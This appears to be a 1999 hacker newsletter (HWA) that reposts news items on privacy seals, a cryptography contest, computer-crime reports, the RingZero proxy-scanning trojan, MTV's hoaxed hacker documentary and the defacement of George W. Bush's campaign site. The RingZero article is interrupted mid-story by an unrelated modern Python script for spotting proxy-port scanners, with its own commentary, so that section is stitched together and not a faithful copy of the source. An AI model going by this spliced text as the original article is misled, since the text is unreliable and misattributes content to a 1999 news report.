Another voluntary privacy program is BBBOnLine, which just awarded its 100th privacy seal with more than 400 applications still in the pipeline. BBBOnLine chief operating officer Robert Bodoff says firms that qualify are banking on privacy being good business for them and for their customers and "helping to build confidence in on-line commerce."

Marketing expert Martha Rogers of Bowling Green University agrees: "The future of one-to-one marketing in which a customer is willing to sell some privacy in return for letting the retailer buy information about that person's buying preferences depends on building trust," she says.

Rogers adds that the relationship may involve getting Americans to "shop in new ways: You can always slide what you don't want anyone to know you're buying into a second shopping cart and forgo the discount."

If that advice sounds familiar, it's Lois Diehl McDonley's advice, too, gleaned from years as a supermarket shopper. Take discounts if you want to and skip them where you feel your privacy could be compromised, she says, and, oh yes, "chill out a little" in the bargain.

As she sees it, "Some people might be embarrassed, but I can't fathom who'd be remotely interested in the stuff I buy."

Mary Deibel is a reporter for Scripps Howard News Service.

@HWA

18.0 Interview With the Cult of the Dead Cow
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
Slashdot is hosting an email interview with the Cult of the Dead Cow. They will be gathering questions until this afternoon and then posting the responses on Friday.

The Cult of the Dead Cow
http://www.cultdeadcow.com

Slashdot
http://slashdot.org/interviews/99/10/18/0939245.shtml

@HWA

19.0 Amazon.com Hosts Crypto Challenge
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Kiad Arch'August
Amazon has posted an interesting challenge for home cryptography buffs.
Break their code and win books, Lego Mindstorms, and bragging rights.

Amazon.com
http://www.amazon.com/exec/obidos/redirect?tag=thehackernewsnet&path=subst/promotions/crypto/crypto-contest.html

Crack the Code
Do You Have the Skills to Win the Contest?

Welcome to Amazon.com's Cryptography Contest, where you can test your decryption skills and win a swell prize package chock full of geek goodies--signed copies of four classic crypto books, and a brain-bending programmable robot kit! You don't need any special math skills to decrypt the messages--just good old-fashioned smarts and a little persistence.

Cryptography is the art and science of secret messages. Since people first set stylus to tablet, ciphers and codes have been used to conceal the meaning of written text. Cryptography played a vital role in politics, business, and war throughout history, changing the fortunes of Julius Caesar and Mary Queen of Scots, among others. Why, without cryptography, the Allies might never have won World War II! These days, cryptography is crucial in the everyday workings of our computers, from e-mail encryption to secure financial transactions.

Here at Amazon.com, we like to think of cryptography as a good, wholesome activity, providing hours of fun for the whole family. But it's no fun if no one gets the correct answer, so if you're having trouble, check back--we may post some hints to help you get started.

Without further ado, may we present the crypto-challenge. Happy solving!

    038-097-34-64-242-335-51-377-183-168
    038-097-34-64-380-330-115-289-273-189-56
    068-486-42-23-87-434-10-468-151-345-150-494-376-415-426
    038-549-53-15-1-193-121-29-109-66-28-160-106
    047-111-70-99-24-21-25-12-53-22-56-8

--Code created by Alex Yan and Katherine Degelau

The Payoff
Gee Whiz, Look at All This Keen Stuff!
- Signed editions of Cryptonomicon, The Code Book, Between Silk and Cyanide, and Applied Cryptography
- A LEGO® Mindstorms(TM) Robotics Invention System kit
- A chance to tell the world how you solved the crypto puzzle!

How to Enter

1. Send your answer, via e-mail, to crypto-contest@amazon.com.
2. Include the full finished translation of the puzzle, as well as your full name and daytime telephone number.
3. Your entry (one per person, please) must be received by 11:59 pm (PST) Friday, October 29, 1999, or we won't be able to evaluate it.
4. Entries with the correct solution will be entered into a random drawing, from which we will pick the winner.
5. You must be a resident of the U.S. or Canada, excluding Quebec, to participate.

@HWA

20.0 Web Sites Cause Crime, Report Says
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Q Bahl
Computer Economics, an independent research firm, has released a report blaming underground websites for the proliferation of computer crime. The damage caused by underground websites, they say, is estimated at over 1 trillion dollars a year worldwide.

Yahoo News
http://biz.yahoo.com/bw/991018/ca_compute_1.html

Computer Economics
http://www.computereconomics.com

Yahoo; Monday October 18, 9:03 am Eastern Time

Company Press Release

Computer Crime-Abetting Sites Will Dramatically Increase Costs for Businesses and Consumers

CARLSBAD, Calif.--(BUSINESS WIRE)--Oct. 18, 1999--Hacking and computer-crime-abetting Web sites are supplying Web surfers with tools and instructions that could cost consumers and businesses worldwide over a trillion dollars this year. Computer Economics research shows that hacking and computer crime will experience a dramatic increase in the next few years due to the abundance of Web sites devoted to these topics. Also factoring into the growth of computer crime is the low cost of the tools and instructions that these sites sell, and the rise of the wireless Internet.
``The Internet has always been a haven for computer criminals,'' said Computer Economics research analyst Adam Harriss. ``The technologically savvy hackers have been online swapping tips and programming for decades, but now the information is being posted and sold at low cost in a form that even the techno-illiterate can understand. Causing damage to machines and infiltrating systems has become as easy as putting together a child's Christmas toy.''

While some hacker sites warn that the products they sell are to be used for informational purposes only, other sites pander to malicious users, and are growing a future generation of hackers by targeting children. The proprietors of some hacking manuals tout them as guides that help users ``search for company secrets.'' Vendors of hacking hardware often boast that their goods ``screw up all types of computer disks.'' Software that could be used to pirate other programs is sometimes said to be ``a must for anyone who doesn't want to pay full price for software.''

Not only are these hacking tools priced very low, but many of the most popular hacking tools, such as L0phtCrack, AntiSniff, nmap, and netcat are free shareware. Manuals and software about hacking and computer crime interests such as viruses, counterfeiting, piracy, and various types of fraud typically run from $8 to $60. The following table shows a few examples of the types of information and technology that are available for order at low prices on the Internet.

Computer Crime Instructions and Software Available Online

  Item                                                           Price
  -------------------------------------------------------------  -----
  A manual that tells Microsoft users how to avoid the $35 per   $10
  incident fee for tech support after the 90 days of free
  support has run out.

  Software and instructions to circumvent any Internet sites     $30
  that are restricted by a ``parental block.''

  Software to remotely infiltrate the hard drives of people in   $50
  chat rooms and copy their software.

  A disk containing over 4000 live viruses including CIA,        $42
  Michaelangelo, JerusalemB, Dark Avenger, Darth Vader, Kool
  Aid, AIDS, Rape, Keydrop, Null, and Quiet.

  A guide to making a profit from software bootlegging.          $8

  Complete guide to hacking a Novell network. Software and       $25
  texts are included.

  Instructions about how to break into any Eudora account.       $30

The low cost of computer crime software and hardware combined with the dramatic expansion of the Internet into new, lesser-developed regions of the world promises to exacerbate the hacking problem. There are roughly three times as many people using wireless phone services as there are people on the Internet, so there is the possibility of an online explosion once a wireless Internet is established. With the expansion and proliferation of the Internet in many countries with loose regulation of computer crime and poorly organized law enforcement, hacking and computer crime will flourish in the years to come.

Computer Economics is an independent research firm specializing in helping IT decision makers plan, manage, and control IT costs through advisory services, analyst support, an innovative Web site, and printed reports. Based in Carlsbad, Calif., Computer Economics serves 82 percent of the Fortune 500. For further information, please visit the Web site at http://www.computereconomics.com.

Contact:
Computer Economics Inc.
Catherine Huneke, 760/438-8100, ext. 108 or 116
chuneke@compecon.com
http://www.computereconomics.com

@HWA

21.0 China to Use Viruses During War
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
The People's Liberation Army of China is said to be preparing to fight a 'dirty war'. This includes terrorism, biochemical warfare, environmental damage and computer viruses in an effort to create political and economic crisis.
South China Morning Post
http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-19991018025207920.asp

Monday, October 18, 1999

'PLA has plan to destroy West's finance systems in dirty war'
SIMON MACKLIN in London

Chinese military strategists have developed plans to destroy Western financial institutions in the event of a major conflict, according to a report in a British newspaper.

Senior members of the People's Liberation Army are said to be urging the Government to abandon conventional defence strategies and prepare for a "dirty war".

The Sunday Telegraph yesterday said PLA officials were advocating terrorism, biochemical warfare, environmental damage and computer viruses as a means of throwing the West into political and economic crisis.

The maverick officers maintained that the mainland must use such tactics because it cannot hope to match the West's military might.

Outlines of the plans have been revealed in books and newspaper articles published on the mainland. The blueprints for the dirty war say the PLA should infiltrate and sabotage key pillars of Western society, including banks and the public sector, in response to a direct threat of war.

The officers argue that Beijing's attempts to upgrade its nuclear and conventional arsenal to match America's are insufficient to prepare China for conflict.

The increasingly global world economy is pinpointed as a weak point which should be exploited, and the PLA officers write admiringly of US financier George Soros, whose attacks on foreign currencies are seen as a template for disrupting an enemy's economic system.

One recent article proposed that Beijing should set aside US$100 billion (HK$775 billion) for such measures.

A recently published book, Unrestricted War, says China must use every weapon available to make itself equal to more developed countries. Another book by two PLA air force colonels lists 24 types of "dirty war" that could be waged against the US and its allies.
Colonel Qiao Liang, the author of a similar book, justified his eccentric advice in a full-page newspaper article published in China.

"All strong countries make rules while all rising ones break them and exploit loopholes. Foreigners always rise by breaking the rules of civilised and developed countries, which is what history is all about," he wrote.

@HWA

22.0 Call for Public Security Database
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne
At the recent National Information Systems Security Conference speakers called for a publicly accessible database of uncovered modes of attack. The conference, sponsored by the Commerce Department's National Institute of Standards and Technology (NIST) and the National Security Agency, was attended by military and intelligence people and industry executives from all over the world in an effort to bond together against what they call "united attackers". (A public database is sure better than what numerous other agencies are proposing.)

San Jose Mercury News
http://www.mercurycenter.com/business/top/067614.htm

Posted at 10:09 p.m. PDT Monday, October 18, 1999

Tech firms urged to unite against computer vandals

BY DAVID L. WILSON
Mercury News Washington Bureau

ARLINGTON, VA. -- The people who make it their business to protect secure computer systems from illicit penetration by outsiders agreed Monday they have something important to learn from the villains: pooling information.

By sharing information with each other, computer vandals gain an enormous advantage over those who try to thwart them, according to experts at a high-level conference on computer security here Monday. They cited an urgent need to overcome a penchant for secrecy and do a better job sharing resources.
``By sharing we gain a tremendous amount, and by not sharing we're not keeping any secrets,'' argued Matt Bishop, an associate professor of computer science at the University of California-Davis and a prominent authority on computer security.

The National Information Systems Security Conference -- sponsored by the Commerce Department's National Institute of Standards and Technology (NIST) and the National Security Agency -- brought industry executives together with military and intelligence researchers from around the world to strategize on the battle against ``the intruder community.''

Wily ``crackers'' -- the black hats of the game -- break into computer systems to steal valuable information, eavesdrop and otherwise humiliate their prey, or simply engage in vandalism by erasing all the data on a supposedly secure hard drive.

Others in this cyberspace demimonde -- call them white hats or ``hackers'' -- also test the security of computer systems, but with a benign intent: Their sport is to discover vulnerability and help plug holes.

Members of both groups routinely exchange information via the Internet, with the black hats using the information to write ``tool kits,'' or software that will automatically attack vulnerable computers. The white hats, meanwhile, use this information to alert computer system administrators of flaws in their security that must be repaired, and try to pressure commercial software developers to issue software ``patches'' to fix the holes.

In this environment, systems administrators can be quickly overwhelmed, said Peter Mell, a scientist with NIST's computer security division. The information used by the attackers is fragmented and diffuse and cannot be verified easily. Members of the intruder community typically don't hold down conventional jobs and can devote long hours to planning a security breach.
Large organizations can try to fend off such guerrilla tactics, Mell told the audience, ``but it is so expensive to get this information, understand it and use it.''

``An attacker only has to find one way into your system,'' said Andrew Balinski, a security research engineer for networking giant Cisco Systems. ``A defender has to defend against all attacks.''

Mell, Balinski and Bishop urged those at the conference to work toward pooling information they've uncovered on intruders' various modus operandi to create a publicly accessible database. Such an effort would make computer security much more practical and effective for everyone, they said.

Cooperating on a common defense may have its drawbacks, however, the speakers acknowledged. An open public database might offer one-stop shopping for information vandals. And some security professionals would fear compromising their competitive advantage by sharing information.

Yet the defenders desperately need a system that can make it more cost effective to stay current on security threats, the experts argued. A good first step would be to develop a common framework to let researchers quickly classify attacks using standard descriptions. But even that won't be easy to accomplish.

``The attackers share a common goal,'' said Bishop, the UC Davis professor. ``We don't.''

@HWA

23.0 GAO Calls for Security Laws
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
With NIPC, CIAO, NIST, and even the Office of Management and Budget all legally tasked to define security standards for various government agencies, the Government Accounting Office feels it is time for Congress to step in and pass some laws. The GAO is recommending that laws be passed to help direct these various security efforts and eliminate duplication and overlap.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/1018/fcw-pollaw-10-18-99.html

OCTOBER 18, 1999

GAO: IT security law needed
Law would help direct disparate security policies

BY DIANE FRANK (diane_frank@fcw.com)

Agencies have improved the security of many information systems, but the lack of clearly defined roles among agencies coordinating security has hindered federal security experts' ability to protect systems from intrusion, according to the General Accounting Office.

Agencies have spent the past two years plugging security holes in computer systems, but it has been such an ad hoc effort that federal security managers have been left without any coordinated guidance on developing a fully secure government, GAO officials told the Senate Judiciary Technology, Terrorism and Government Information Subcommittee this month.

To help pull together agencies' efforts, GAO recommended that Congress consider passing legislation that would better define how lead organizations should work together and how agencies should follow their direction.

"It's not so much that there needs to be one central organization in charge as the need for defining where each organization fits," said Jean Boltz, assistant director of governmentwide and defense information systems within GAO's Accounting and Information Management Division (AIMD). "I think this is an area where legislation should definitely be considered."

Until recently, the authority to oversee computer security resided in two organizations. The Paperwork Reduction Act of 1995 gave security oversight authority to the Office of Management and Budget, while the Computer Security Act of 1987 gave authority to the National Institute of Standards and Technology. But last year, President Clinton issued Presidential Decision Directive 63, requiring agencies to protect their critical information systems from cyberattacks.
While PDD 63 helped focus federal attention on growing information security threats, it also created several new groups, including the National Infrastructure Protection Center at the FBI and the Critical Infrastructure Assurance Office (CIAO) at the National Security Council. The organizations' overlapping -- and in some cases conflicting -- responsibilities have led to duplicate efforts, such as developing governmentwide instead of agency-specific best-practices guidelines, which has confused agencies, according to GAO executives.

"While these organizations have developed fundamentally sound policies and guidance and have undertaken potentially useful initiatives, effective improvements are not taking place," Jack Brock, director of the AIMD office, testified before the subcommittee this month.

Some of the problems stem from the fact that the NIPC and the CIAO, formed in 1998, and the CIO Council, formed in 1997, are relatively new, and any new process or organization will need to iron out kinks, Brock said. Still, some basic security issues must be solved soon, he said.

"It is unclear how the activities of these many organizations interrelate, who should be held accountable for their success or failure and whether they will effectively and efficiently support national goals," Brock said.

For agencies that are developing their own security plans under PDD 63 while complying with OMB regulations, it can be especially confusing getting guidance from so many places, Boltz said. And the fact that some organizations' power is prescribed by law while others' is given by PDD 63 or other executive orders leaves agencies wondering which orders apply.

Some legislative changes are under way in Congress. The House Science Technology Subcommittee is working on the Computer Security Enhancement Act, a bill that would update NIST's role in the governmentwide security landscape.
Others, including the Senate Government Affairs Committee, also have expressed interest in the issue of legislation.

"There's a lot of interest and a lot of people looking at it right now," Boltz said. "It's really coming to fruition."

@HWA

24.0 RingZero Still on the Loose
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by toka25
HNN first mentioned this virus last week but now more information is available. RingZero was designed to search the internet for proxy servers. RingZero has been labeled a "quantum leap in distributed attack technology" by researchers.

CMP TechWeb
http://www.techweb.com/wire/story/TWB19991013S0018

Experts Fear Trojan Proxy Server Virus
(10/13/99, 7:05 p.m. ET)
By Lee Kimber, TechWeb

Security experts are trying to track down the perpetrators of a huge Internet surveillance operation that they say could presage an attack on websites around the world.

Members of the Bethesda, Md.-based System Administration, Networking, and Security (SANS) Institute have already identified over 200 copies of a Trojan virus called RingZero that scans Web proxy servers and relays its findings back to remote computers across the Internet. That means information, including credit card numbers and other private transaction information, could be stolen.

Since SANS warned its 64,000 members to check for the Trojan after the first was discovered two weeks ago, its researchers have slowly pieced together frightening evidence of a systematic attempt to gather information from commercial proxy servers.

Proxy servers are widely used by business to handle Web access on office networks. They host intranet websites, let administrators restrict the websites staff may visit and cut bandwidth costs.

Once installed on a network, RingZero's pst.exe file randomly scans for proxy servers and makes them send their own Internet address and port number to what appears to be a data collection script running on a machine at www.rusftpsearch.net.
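One way to act on SANS's advice in this article to watch for outgoing traffic on ports 8080 and 3128 from a network that runs no proxy, as an added example that is not from the article or from SANS: the Python below counts how many distinct destinations each host probes on those ports in a constructed set of connection records, ignoring a known corporate proxy so that ordinary browsing through it is not flagged. The record format, the addresses and the corporate proxy are all assumptions made for the sample.

```python
"""Spot hosts that behave like RingZero's pst.exe: connection attempts to the
proxy ports 8080 and 3128 at many different destinations, from a network
segment that has no proxy of its own.

Added example, not from the TechWeb article or from SANS. The input is a
constructed list of connection records; a real deployment would read the
same fields (time, source, destination, destination port) from firewall or
NetFlow logs.
"""
from collections import defaultdict

PROXY_PORTS = {8080, 3128}   # ports RingZero probes, per the SANS advice


def parse_record(line):
    """Constructed record format: '<epoch> <src_ip> <dst_ip> <dst_port>'."""
    ts, src, dst, dport = line.split()
    return int(ts), src, dst, int(dport)


def proxy_targets_by_host(records, known_proxies=frozenset()):
    """Map each source IP to the set of distinct destinations it touched on
    a proxy port. Connections to known, legitimate proxies are ignored so a
    host that only uses the corporate proxy does not look like a scanner."""
    targets = defaultdict(set)
    for line in records:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        _, src, dst, dport = parse_record(line)
        if dport in PROXY_PORTS and dst not in known_proxies:
            targets[src].add(dst)
    return targets


def find_proxy_scanners(records, known_proxies=frozenset(), min_targets=5):
    """Return {src_ip: distinct_destination_count} for hosts that probed at
    least min_targets distinct destinations on 8080/3128. A workstation on an
    office network has no business doing that; the fan-out across many
    destinations is what separates a RingZero-style scanner from a user who
    simply browses through one proxy."""
    return {src: len(dsts)
            for src, dsts in proxy_targets_by_host(records, known_proxies).items()
            if len(dsts) >= min_targets}


# Constructed sample: 10.0.0.5 browses through the corporate proxy 10.0.0.1,
# 10.0.0.7 browses directly on 80/443, and 10.0.0.23 sprays 8080/3128 at
# addresses in the TEST-NET-2 documentation range.
CORP_PROXIES = frozenset({"10.0.0.1"})
SAMPLE_RECORDS = """
# epoch      src        dst            dport
940000001 10.0.0.5   10.0.0.1       8080
940000002 10.0.0.5   10.0.0.1       8080
940000003 10.0.0.7   192.0.2.10     80
940000004 10.0.0.7   192.0.2.11     443
940000005 10.0.0.23  198.51.100.1   8080
940000006 10.0.0.23  198.51.100.2   3128
940000007 10.0.0.23  198.51.100.3   8080
940000008 10.0.0.23  198.51.100.4   8080
940000009 10.0.0.23  198.51.100.5   3128
940000010 10.0.0.23  198.51.100.6   8080
940000011 10.0.0.23  198.51.100.7   8080
940000012 10.0.0.23  198.51.100.8   3128
940000013 10.0.0.23  10.0.0.1       8080
""".strip().splitlines()

if __name__ == "__main__":
    for host, count in find_proxy_scanners(SAMPLE_RECORDS, CORP_PROXIES).items():
        print(f"{host}: {count} distinct hosts probed on {sorted(PROXY_PORTS)}")
```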
Crackers use IP addresses and port numbers as a starting point for breaking into computers.

"It's a quantum leap in distributed attack technology," said SANS security researcher John Green. "The proxy is being used to send its own IP address and proxy port home to the mothership."

But SANS researchers think RingZero has other abilities too. They found the Trojan has a second part, called its.exe, that tries to retrieve files directly from Web-servers. Both parts seem able to work independently of each other. The researchers are currently trying to determine what the file-retrieving component does with its booty.

SANS is asking network administrators to check their systems for files called pst.exe and its.exe. It also wants to hear from any administrator who sees outgoing network traffic on port 8080 and 3128. Seeing such traffic on a network that doesn't have a proxy server is a strong sign that they have been infected by the RingZero.

@HWA

25.0 MTV Called Inexcusable By ITC
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

The Independent Television Commission (ITC) has labelled the recent MTV show on Hackers as inexcusable. The show attempted to portray what hackers and hacking is all about. Instead MTV was taken for a ride by one of the people they profiled and MTV failed to verify any of the 'facts' presented to them. The end result being that the underground community was portrayed as a bunch of criminals with no redeemable qualities.

ZD Net
http://www.zdnet.co.uk/news/1999/41/ns-10798.html

Emmanuel Goldstein and the staff of 2600 spent a large amount of energy with the MTV crew when it was thought that MTV wanted to do a story on Kevin Mitnick. As it turns out MTV evidently did not have enough time and cut out all references to Mitnick.
Emmanuel Goldstein's Comments
http://www.hackernews.com/orig/emmanuel.html

Shamrock's Statement
http://www.hackernews.com/orig/shamrock.html
(See elsewhere this issue)

HNN Reader Comments
http://www.hackernews.com/orig/mtv.html

MTV's True Life: I'm a Hacker
http://www.mtv.com/mtv/tubescan/truelife/

ZDNet;

MTV made to look ridiculous by fake hacker
Tue, 19 Oct 1999 17:31:17 GMT
Will Knight

TV channel's blinkered view of hackers enabled programme hoax

America's premier music television channel, MTV has been duped by a hoaxer in its much-maligned "True Life: I'm a Hacker" programme. After the show was screened in the US, the main character in the show, Shamrock, issued a statement revealing that he made the whole thing up.

Shamrock, who last week gave an in-depth interview with MTV explaining the motivation behind his hacking exploits, on Monday said the show was total nonsense and was designed to illustrate how gullible MTV was.

In the statement, published on the Hacking News Network Shamrock explained it was MTV's cynical approach to hacking that prompted his scam. "We waited for months to see if they would be realistic and after it was obvious that they wouldn't, we figured the only option would be to discredit them with as much fiction as possible."

Shamrock adds that he and fellow hoaxers never expected MTV to swallow the absurdities they made up and argued the hoax illustrated the shallow nature of the mainstream media. "We had no intention of making hackers look bad. All I can do is reiterate to you just how fake and hollow what you see on television is. After this experience I wonder where if any truth lies in what we are told to watch. This is the obvious issue the hacker community needs to address."

Practising British hacker Harlequin, famed for defacing international Websites, told ZDNet News the media is often guilty of misunderstanding and misrepresenting hackers.
He said: "Hacking and computer technology are very complex areas, both technically and socially. Naivety can easily be exploited as well as accuracy."

A representative from the Independent Television Commission (ITC), the British television industry's independent watchdog, said that it considers this kind of blunder inexcusable. "This sort of thing is not difficult to detect if you've done your work properly. We would expect program makers to do their work and to make things that are factually accurate."

Despite several attempts, ZDNet was unable to reach an MTV spokesperson.

Goldstein's comments;

Submitted By: Emmanuel Goldstein

I haven't had time to even begin to deal with this until now. So I'll be as clear as possible. Our fears of what this show would be simply did not do it justice. The reality was so much worse than any of the warnings we started getting months ago. And the most troubling part of all this is that so many people involved in this really knew better yet sensationalism was allowed to run unchecked.

A little history to begin with. We at 2600 were approached by MTV back in 1998 when they expressed an interest in doing a hacker documentary, with the Mitnick case being a focal point. For months after, we helped hook them up with various people and spent a considerable amount of time working with them and helping them however we could. The first warnings of trouble came from an MTV intern who called into "Off The Hook" on June 29 with the revelation that all references to Mitnick had been eliminated and that the "documentary" was now going to focus exclusively on three trendy teens instead of the people and issues that were originally said to be the focus. Even with this disturbing news, we told people to not pass judgement until the thing had aired.

Well, it's aired and now it's judgement day.

Right away, the show begins with such sensationalism and quotes meant to scare the shit out of Joe America that I swear I could *smell* Geraldo. "It's like being God." "If I had the opportunity to shut off all the power in the city, would I do it?" "We want to know the location of every squad car within the nearest vicinity [sic]." And finally, "What people don't understand, they fear." Well, that's sure the theme of this half hour, isn't it? MTV clearly didn't grasp what hackers are or maybe they just didn't *want* to since anything that complex might confuse the audience they know so well. And they certainly did their bit to spread fear throughout the program with quotes like the above, with absolutely nothing to show that this was anything other than teenage bravado.

Then the part that really pissed me off personally. Earlier this year, I had asked the producers for one little thing in exchange for all the help that I and other 2600 people had given them. President Clinton had given a speech in January on computer hackers. We couldn't get the White House to give us a video copy which we would have loved to use in our upcoming documentary. I asked them if they could pull some strings and they said they'd look into it. Last I heard they were having no success. And guess what footage managed to show up in this program? That's right, the footage they didn't even KNOW about which they obtained after all and kept for themselves without a word to any of us! Fortunately there are other networks who *do* live up to their promises and we've gotten the footage from them. But this shows the sleaze factor at work in this kind of a production.

"Never before have people so young had so much potential power to disrupt the systems we all rely on." Please. Here we have the MTV age fixation coupled with a blatant bit of hysteria with no factual basis to back it up. Better get used to it as virtually none of the "facts" presented in the next half hour will be researched or confirmed in any way.

"Chameleon faced off with one of America's most dangerous enemies."
This is basically Chameleon getting a piece of mail from someone he doesn't know who lives overseas - at least that's all the details we're going to get here.

"Shamrock - role model or renegade?" Yeah, that's the question that's been plaguing the hacker world for years.

"Mantis - who says he can find out anything he wants about you." Just by making such a claim, MTV will skip over all the proof and do a feature on you as if everything you claim is true. Not one iota of evidence is ever presented to back up this absurd bragging.

Now I want to point out that I don't personally have anything against any of the people who were portrayed in this program. They were basically taken in by MTV and taken advantage of. But by the same token, I don't think these people have a whole lot to do with the hacker community - at least, not from what we could see here. Almost every sentence uttered throughout this program was a mistruth of one sort or another.

Mantis: "People see hackers as some fat kid sitting at home dressed in black... I don't fit the stereotype of a hacker." Well, guess what? You *do* fit the stereotype - MTV's stereotype or else why would they have ignored all of the other people who are part of the hacker world who don't fit into the MTV demographic? It's hard to figure out who was playing who more - these kids or the MTV marketers.

Narrator: "At 16, Chameleon left high school and became a superstar of the hacking underground." Yeah, we have superstars in the hacker world just like in the music business - how convenient for MTV. In fact, we don't really care at all about the technology - it's all about personalities. (That was sarcasm in case any MTV people are getting hard reading that.)

They seem really happy turning the whole thing into an episode of COPS while Shamrock and friends walk in slow motion down city streets with blurred faces. They can't get enough of his involvement with drug dealing, as if that has got anything to do with anything.
They call him an expert on "phone phreaking" and once again don't back it up in any way. Apparently just walking down a street saying "I have knowledge that many people don't" is enough for MTV to believe you.

"Not much is legal about hacking but it's never been easier to do." I'd love to see MTV's definition of hacking. From this show it would appear to be: affiliating with terrorists, taking over the military, moving satellites, and dealing drugs.

Serena is once again amazed that Mantis has a copy of "The Matrix" on his computer. Apparently, she's never had the opportunity to download a file. That's really all there is to it, you know. It's pretty fucking simple and, once again, has got absolutely nothing to do with hacking. But you have to love the mixed up hacker logic that is used to defend copying a movie: "It's all about trading information. Information has to be free. If Big Brother is watching me, why can't he be watched also?" Hello?? The MATRIX?! Copying a pirated movie is somehow striking out at Big Brother? What an insult to the many truly deserving causes that are out there and were passed over for this tripe.

The only part of the program with any glimmer of what hacking is about is the section on the L0pht. But they never even bother to get into it, spending less than a minute on the entire group/concept and using the majority of *that* time to portray them as people whose most important ability would be disrupting the entire Internet.

Next, Serena follows Shamrock as he attempts to get to an imprisoned friend's disk before the authorities do. (Didn't we see this plot device in "Hackers"?) Of course we never see the disk, don't get any details about the friend, and learn absolutely nothing about anything in the whole fiasco. But we do get to hear this bizarre exchange:

- Serena: "What do you think you can find on this disk?"
- Shamrock: "The police! You know, when we're listening to them on the radio, obviously they're transmitting on a radio frequency - we know what frequency they're transmitting on cuz we're receiving it."

Maybe a good dose of LSD is the only thing that'll make sense out of that.

"You never know what you're dealing with when it comes to hacking" is one of the insightful concluding thoughts. You also never know what you're dealing with when you don't do any research into the subject matter or check out your sources.

I'm hearing now that Shamrock is claiming he made the whole thing up just to fuck with them. If that's true, MTV certainly got what they deserved by ignoring the advice and warnings of knowledgeable people in order to pursue an utterly fictitious story. But while Shamrock may have thought it was amusing, it was stupid and caused great harm to the community by making people believe this kind of crap. I can only assume that he thought they would actually check the facts before running with the story. Now we all know better.

As for Chameleon, all kinds of allegations are thrown around about his dealing with a terrorist. Yet the only "evidence" of this comes from the editor of AntiOnline, who does not exactly have a good reputation when it comes to presenting facts accurately. (MTV hired him as their technology consultant - another detail they kept quiet.) There is absolutely NO EVIDENCE from a credible source that this foreign person he got a check from had anything to do with any terrorist group. All it shows is that someone was monumentally stupid in thinking that paying to hack a web page was a good idea. Again, nothing to do with hacking. Again, the facts were never checked.

Mantis: "I've been to the end of the Internet and back - over the course of my years, I've done everything possible." This kid is 19. With a boast like that, I expect him to have found the meaning of life by the time he's 30. I say we hold him to it.
What's amazing (and indicative of the MTV sleaze once more) is that Mantis isn't shown to be doing anything illegal. In fact, he's the success story, teaching others, staying out of trouble, doing positive things... Yet MTV manages to make him look like a criminal by getting him to say that *IF* he did something illegal he would know how to cover himself. Slick.

The whole charade ends with footage of Serena not able to get into her AOL account and saying "my account has been hacked by hackers." She feels "angry and violated." There is irony here - most everyone in the hacker world has the same feeling right now because of MTV's yellow journalism. But once again, there is no evidence to suggest that this "hack" is anything more than a publicity stunt, much like when MTV hacked its own web page a while back to get attention. If there is anything to suggest that Serena herself didn't do this or one of her fellow employees didn't set it up to get the "perfect ending," I sure didn't see it. Changing a password on AOL is not exactly hacking. But since nothing else in this half hour was either, we can hardly be surprised.

So the lessons to be learned here are several. The most important being: DON'T TRUST THE MEDIA! Especially the slick and trendy media. They're not interested in the story but rather in being cool and accepted in the industry. If you don't know how to deal with them, they will screw you over and as a result screw over those people you're supposedly speaking on behalf of. Far too many people were getting all excited about MTV doing a piece on Mitnick that they played right into their hands and got crucified. While Kevin was justifiably upset that they cut him out of the program (they claim they just didn't have enough time), I think he'll be happy not to have any affiliation at all with this portrayal.
Interestingly, special thanks are given to David Schindler (Kevin's prosecutor) which means that they actually managed to do a rare video interview with him and still decided to shelve it or maybe he gave them a ton of money to just sit on the story. At this point, I'll believe anything.

emmanuel

@HWA

26.0 Bush Web Site Defaced
     ~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by punkis

The web site of presidential candidate George W Bush was defaced yesterday and filled with Marxist propaganda. Evidently in the rush to switch over from Unix to NT the administrators forgot to remove the sample .asp files.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991019/tc/bush_hacked_3.html

Wired
http://www.wired.com/news/politics/0,1283,31986,00.html

Attrition.org - Screen Shot of Defacement
http://www.attrition.org/mirror/attrition/1999/10/19/www.georgewbush.com/screenshot.jpg

Georgewbush.com
http://www.georgewbush.com/

AP;

Tuesday October 19 8:27 PM ET

Hackers Alter Bush Campaign Site

By TED BRIDIS
Associated Press Writer

WASHINGTON (AP) - Hackers vandalized the campaign Web site for presidential candidate George W. Bush early Tuesday, briefly replacing his photo with an image of a hammer and sickle and calling for ``a new October revolution.''

The embarrassing lapse in computer security came the day after the Bush campaign launched what it described as its ``innovative new design'' for its Internet site, www.georgewbush.com.

``We have taken steps to make sure this particular problem is fixed, and we are looking at other ways to further secure the site,'' spokeswoman Mindy Tucker said. The campaign was considering whether to formally notify the authorities, such as the FBI, she said.

Tucker said the campaign's more sensitive computer operations - such as its e-mail system and contribution records - were protected on other machines and weren't believed to have been compromised.
The hackers replaced a news story about Bush on the Web site with a note that ``the success or failure of the working class to achieve victory depends upon a revolution (of) leadership.''

The Web site runs software from Microsoft Corp. (Nasdaq: MSFT), called Internet Information Server, that has suffered several serious security problems during the past year. Microsoft has distributed patches in each case but relies on local computer administrators to install them correctly.

A review of the Bush Internet site by The Associated Press showed computer files plainly visible that experts recommend deleting for security reasons. One file includes instructions for users to edit Web pages on the site.

